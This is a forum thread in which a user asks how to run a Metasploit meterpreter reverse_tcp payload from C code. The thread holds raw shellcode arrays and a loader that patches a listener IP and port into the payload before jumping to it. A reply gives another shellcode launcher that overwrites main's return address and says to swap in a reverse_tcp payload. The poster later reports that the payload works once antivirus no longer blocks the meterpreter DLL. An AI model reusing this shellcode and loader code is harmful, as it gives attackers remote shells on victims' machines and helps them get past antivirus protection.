Thread: Running metasploit payload in C/C++ app

  1. #1
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    3

    Hello!

    I want to execute a metasploit reverse_tcp payload from my C code, but I don't know fully how to make it work properly. Here is the sample code I use to test it:

    Code:
    // reverse_tcp.cpp : Defines the entry point for the console application.
    //
    
    #include "stdafx.h"    // MSVC precompiled header
    #include <stdio.h>     // printf
    #include <string.h>    // memcpy
    #include <windows.h>   // Sleep
    
    // reverse_tcp stager; the placeholder IP (offset 142) and port (offset 148)
    // are patched in at run time by main() below.
    unsigned char payload[] =
    "\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
    "\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
    "\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
    "\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
    "\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
    "\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
    "\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
    "\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x43\x53\x43\x53\x89"
    "\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66"
    "\xb9\xa8\x6f\xff\xd6\x97\x68\xc0\xa8\x01\x0a\x66\x68\x11\x5c"
    "\x66\x53\x89\xe3\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50"
    "\xb4\x0c\x50\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6";
    
    int main(int argc, char* argv[])
    {
        // unsigned: the values 192 and 213 do not fit in a signed char
        unsigned char ip[]   = { 192, 168, 1, 213 };
        unsigned char port[] = { 0x11, 0x5C };   // 4444 in network byte order
    
        // overwrite the placeholder listener address and port inside the buffer
        memcpy( payload + 142, ip, 4 );
        memcpy( payload + 148, port, 2 );
    
        // transfer control to the payload buffer
        _asm {
            lea eax, payload
            call eax
        }
    
        printf( "started.\n" );
        while(1)
        {
            Sleep(100);
        }
    
        return 0;
    }
    That code will raise an exception that it can't read address 0xffffffff. I tried using try-catch blocks and it made it not crash, but anyway Metasploit multi/handler gets stuck on "Upload completed" (I want to use meterpreter payload for uploading) and nothing happens after that. __try-__except blocks also didn't do the trick. The session will open when I exit the program, but it will close immediately afterwards.
    Probably you know much better how to call the payload properly in C code to make it work properly.

    Regards,
    Black Dot

  2. #2
    Member: imported_pynstrom
    Join Date
    May 2008
    Posts
    143

    This C code should work; the payload here is (windows/exec CMD=calc.exe EXITFUNC=thread) encoded with the generic msf encoder.
    Code:
    unsigned char shellcode[] =
    "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef"
    "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31"
    "\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b"
    "\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
    "\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f"
    "\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad"
    "\x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\xef\xce\xe0\x60\x68"
    "\x98\xfe\x8a\x0e\x57\xff\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65"
    "\x00\x0a";
    
    int main()
    {
      int *ret;
      // two slots above the local variable is main's saved return address
      ret = (int *)&ret + 2;
      // overwrite it, so returning from main continues in the shellcode buffer
      (*ret) = (int)shellcode;
    }
    I use the command line compiler included with MS Visual Studio for windoze and gcc for linux. Works fine. Just replace the shellcode with your reverse_tcp payload generated with msfpayload | msfencode.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    3

    Thanks for the suggestion with overwriting the return address, but it still crashes on trying to read 0xFFFFFFFF. The payload executes fine and it sends back the meterpreter stager from metasploit on my other laptop, but it just won't open the session. The target app crashes and metasploit gets stuck on "Upload completed.".

    Calc shellcode will run fine, but it seems it's just meterpreter reverse_tcp payload that is having a problem.

    EDIT: Ok, sorry, my problem was caused by Kaspersky, which is probably protecting the computer from putting metsrv.dll into the system32 directory. I checked on my desktop with ZoneAlarm installed and it works like a charm.
